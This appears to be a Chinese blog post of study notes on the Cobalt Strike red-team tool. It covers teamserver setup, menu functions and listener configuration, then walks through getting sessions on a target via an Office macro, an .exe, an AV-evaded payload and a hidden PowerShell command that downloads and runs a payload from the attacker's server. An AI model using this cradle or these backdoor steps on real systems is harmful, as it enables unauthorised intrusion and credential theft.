文章目录
前言
本篇文章仅作为本人学习笔记,如有问题请各位大佬指正!
一、cobalt strike是什么?
Cobalt Strike是一种针对网络攻击和渗透测试的工具套件,最初是由Raphael Mudge开发的。它被广泛使用于红队行动、渗透测试和攻击模拟等领域。
Cobalt Strike提供了一系列功能,包括社交工程、恶意软件传播、漏洞利用、远程控制、数据搜集和横向渗透等。它支持多种攻击技术,如Spear Phishing、水坑攻击、中间人攻击和无线网络攻击等。
Cobalt Strike的特点之一是其灵活的协作功能。它允许多个渗透测试人员同时使用工具,共享资源和收集结果,以提高工作效率。此外,Cobalt Strike还支持与Metasploit Framework集成,以加强攻击能力。
Cobalt Strike具有友好的用户界面和强大的功能,使得它成为红队行动和渗透测试团队的首选工具之一。然而,需要强调的是,Cobalt Strike是一款强大的攻击工具,只能在合法和授权的情况下使用,以遵守法律和道德规范。

二、安装Cobalt Strike
1.链接
2.Cobalt Strike启动
- 首先,想要开启多人运动愉快的玩耍,需要先启动团队服务器(teamserver),本次实验服务器搭选择建在Kali,客户端程序选择搭建在Windows11;
sudo ./teamserver <kali的IP> <密码>
//进入到teamserver文件下,启动团队服务器

- Windows客户端启动只需要点击即可,如果你的客户端在Linux,启动输入
sudo ./cobaltstrike,此时会出现一个让人有难言之隐的窗口,当然,多人运动嘛,每个人必须使用不同的用户名,然后输入正确信息,轻轻点击connect慢慢的进入,打枪的不要;

3.功能介绍

Cobalt Strike
| 选项 | 作用 |
|---|---|
| New Connection | 新建连接 |
| Preferences | 设置 |
| Visualization | 视图(枢纽试图、会话列表、目标列表 ) |
| VPN Interface | VPN接口 |
| Listeners | 监听 |
| Script Manangers | 脚本管理器 |
| Close | 关闭 |
View(查看)
| 选项 | 作用 |
|---|---|
| Applications | 显示应用信息 |
| Credentials | 显示受害者凭证信息 |
| Downloads | 文件下载 |
| Event Log | 事件日志;连接日志及系统日志 |
| Keystrokes | 键盘记录 |
| Proxy Pivots | 代理 |
| Screemshots | 屏幕截图 |
| Script Console | 脚本控制台 |
| Targets | 目标列表 |
| Web log | web日志 |
Attacks(攻击)
Packages # 生成后门
-- HTML Aplications # 网页后门
-- MS Office MAcro #office宏后门
-- Payload Generator #生成各种编程语言的后门
-- Windows Executable #可执行的exe文件
-- Windows Executable(s) #生成无状态的可执行exe文件
Web Drive—by #web类攻击
-- Mange 管理器
-- Clone Site ##克隆网站,可以记录受害者提交的数据;
-- Host file # 提供一个文件下载,可以修改Mime信息; 可以配合DNS欺骗实现挂马效果使用
-- Script Web Delivery # 类似于msf 的web_delivery
-- Signed Applet Attack # 使用java自签名的程序进行钓鱼攻击
-- Smart Applet Attack #自动检测java版本并进行攻击,针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本;
-- System Profiler # 用来获取一些系统信息,比如系统版本,Flash版本,浏览器版本等。
Spear Phish #钓鱼攻击
Reporting(报告)
| 选项 | 作用 |
|---|---|
| Activity Report | 活动报告 |
| Hosts Report | 主机报告 |
| Indicators of Compromise | 目标报告 |
| Sessions Report | 会话报告 |
| Social Engineering Report | 社会工程报告 |
| Reset Data | 重置数据 |
| Export Data | 导出数据 |
4. 生成监听器
选择左上角耳机标志,在下面点击add添加,名字随意,HTTP Hosts选择服务器主机IP,端口可以任意设置,尽量设置的不要引起端口冲突
- HTTP Hosts:木马执行以后反连的地址;
- HTTP Host(Stager):Stager的马请求下载Payload的地方;
- HTTP Port(C2):木马反弹给服务端的哪个端口;

三、上线方式演示
1.宏上线(MS Office MAcro)
- 选择攻击载荷里面的MS Office MAcro

- 生成,复制


- 打开word,选择试图—宏—输入名称—创建宏—点击编辑,把复制的内容粘贴进去,保存,关闭

- 怨种点击word,显示上线成功

2. .exe可执行文件上线
- 方法如上,点击选择监听者,生成.exe文件



- 大冤种打开999.exe,上线成功

3. PowerShell上线


- 将内容复制
powershell.exe -nop -w hidden -c "IEX ((new-object
net.webclient).downloadstring('http://客户端IP:80/a'))"

- 怨种打开了命令窗口,将内容粘贴进去,点击了确认

- 上线成功

4. Payload Generator上线



- 生成的文件做个免杀

- 怨种点击一下,上线成功

更新ing…
1525

被折叠的 条评论
为什么被折叠?



